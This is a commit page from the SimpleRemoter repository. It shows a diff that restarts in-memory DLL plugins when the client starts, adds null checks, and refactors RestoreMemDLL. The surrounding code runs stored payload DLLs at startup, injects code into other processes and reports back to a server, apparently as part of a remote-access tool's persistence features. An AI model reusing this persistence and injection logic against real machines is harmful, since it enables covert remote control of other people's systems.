yuanyuanxiang/SimpleRemoter
0
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases 5 Wiki Activity

Fix: Restore memory DLL at client program startup

Browse Source
This commit is contained in:
yuanyuanxiang
2026-06-19 21:10:48 +02:00
parent 71963b740b
commit c1433b4b5d
3 changed files with 12 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
client/ClientDll.cpp
View File

@@ -591,6 +591,7 @@ DWORD WINAPI StartClient(LPVOID lParam)
app.SetThreadRun(TRUE); app.SetThreadRun(TRUE);
ThreadInfo* kb = CreateKB(&settings, bExit, pubIP, isAuthKernel); ThreadInfo* kb = CreateKB(&settings, bExit, pubIP, isAuthKernel);
static auto _ = RestoreMemDLL(&cfg, &settings, app.g_bExit);
while (app.m_bIsRunning(&app)) { while (app.m_bIsRunning(&app)) {
ULONGLONG dwTickCount = GetTickCount64(); ULONGLONG dwTickCount = GetTickCount64();
if (!ClientObject->ConnectServer(settings.ServerIP(), settings.ServerPort())) { if (!ClientObject->ConnectServer(settings.ServerIP(), settings.ServerPort())) {

22
client/KernelManager.cpp
View File

@@ -81,11 +81,6 @@ CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject,
m_hKeyboard = kb; m_hKeyboard = kb;
// C2C 初始化 // C2C 初始化
if (conn) m_MyClientID = conn->clientID; if (conn) m_MyClientID = conn->clientID;
// 恢复并启动 SCH_MODE_STARTUP 模式的 DLL
static int n = RestoreMemDLL();
if (n) {
Mprintf("[CKernelManager] RestoreMemDLL count: %d\n", n);
}
} }
BOOL IsThreadsRunning(ThreadInfo* threads, int count) BOOL IsThreadsRunning(ThreadInfo* threads, int count)
@@ -281,10 +276,10 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
r=proc(f->privilegeKey, f->timestamp, f->serverAddr, f->serverPort, f->localPort, f->remotePort, r=proc(f->privilegeKey, f->timestamp, f->serverAddr, f->serverPort, f->localPort, f->remotePort,
&CKernelManager::g_IsAppExit); &CKernelManager::g_IsAppExit);
} }
else { else if (This){
This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), ""); This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), "");
} }
if (r || (time(0)-start < 15)) { if (This && (r || (time(0)-start < 15))) {
char buf[100]; char buf[100];
sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r); sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r);
Mprintf("%s\n", buf); Mprintf("%s\n", buf);
@@ -305,10 +300,10 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
r = proc(f->privilegeKey, f->serverAddr, f->serverPort, f->localPort, f->remotePort, r = proc(f->privilegeKey, f->serverAddr, f->serverPort, f->localPort, f->remotePort,
&CKernelManager::g_IsAppExit); &CKernelManager::g_IsAppExit);
} }
else { else if (This){
This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), ""); This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), "");
} }
if (r || (time(0)-start < 15)) { if (This && (r || (time(0)-start < 15))) {
char buf[100]; char buf[100];
sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r); sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r);
Mprintf("%s\n", buf); Mprintf("%s\n", buf);
@@ -332,7 +327,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
sprintf_s(buf, "Inject %s to process [%d] %s", info.Name, info.Pid ? info.Pid : ret, ret ? "succeed" : "failed"); sprintf_s(buf, "Inject %s to process [%d] %s", info.Name, info.Pid ? info.Pid : ret, ret ? "succeed" : "failed");
Mprintf("%s\n", buf); Mprintf("%s\n", buf);
ClientMsg msg("代码注入", buf); ClientMsg msg("代码注入", buf);
This->SendData((LPBYTE)&msg, sizeof(msg)); if (This)This->SendData((LPBYTE)&msg, sizeof(msg));
} }
SAFE_DELETE(dll); SAFE_DELETE(dll);
SAFE_DELETE(runner); SAFE_DELETE(runner);
@@ -649,8 +644,9 @@ std::string getHardwareIDByCfg(std::string& pwdHash, const std::string& masterHa
return ""; return "";
} }
int CKernelManager::RestoreMemDLL() { std::map<std::string, std::vector<BYTE>> RestoreMemDLL(iniFile *m_cfg, CONNECT_ADDRESS* m_conn, State& g_bExit, CKernelManager* This) {
binFile bin(CLIENT_PATH); binFile bin(CLIENT_PATH);
std::map<std::string, std::vector<BYTE>> m_MemDLL;
// 枚举所有以 .md5 结尾的值名称 // 枚举所有以 .md5 结尾的值名称
auto md5Keys = m_cfg->EnumValues("settings", ".md5"); auto md5Keys = m_cfg->EnumValues("settings", ".md5");
@@ -708,7 +704,7 @@ int CKernelManager::RestoreMemDLL() {
if (buf) memcpy(buf, binData.data() + 1 + sizeof(DllExecuteInfo), 400); if (buf) memcpy(buf, binData.data() + 1 + sizeof(DllExecuteInfo), 400);
PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, buf); PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, buf);
BYTE* data = m_MemDLL[md5].data(); BYTE* data = m_MemDLL[md5].data();
CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam<>(infoCopy, param, data, this), 0, NULL)); CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam<>(infoCopy, param, data, This), 0, NULL));
// 更新注册表中的运行时状态 // 更新注册表中的运行时状态
// 如果有时间间隔限制,更新 LastRunTime // 如果有时间间隔限制,更新 LastRunTime
@@ -728,7 +724,7 @@ int CKernelManager::RestoreMemDLL() {
} }
} }
return count; return m_MemDLL;
} }
template<typename T = DllExecuteInfo> template<typename T = DllExecuteInfo>

3
client/KernelManager.h
View File

@@ -184,7 +184,6 @@ public:
uint64_t m_MyClientID = 0; uint64_t m_MyClientID = 0;
// 执行代码 // 执行代码
std::map<std::string, std::vector<BYTE>> m_MemDLL; std::map<std::string, std::vector<BYTE>> m_MemDLL;
int RestoreMemDLL();
void SetLoginMsg(const std::string& msg) void SetLoginMsg(const std::string& msg)
{ {
m_LoginMsg = msg; m_LoginMsg = msg;
@@ -295,4 +294,6 @@ public:
} }
}; };
std::map<std::string, std::vector<BYTE>> RestoreMemDLL(iniFile* m_cfg, CONNECT_ADDRESS* m_conn, State& g_bExit, CKernelManager* This = NULL);
#endif // !defined(AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_) #endif // !defined(AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_)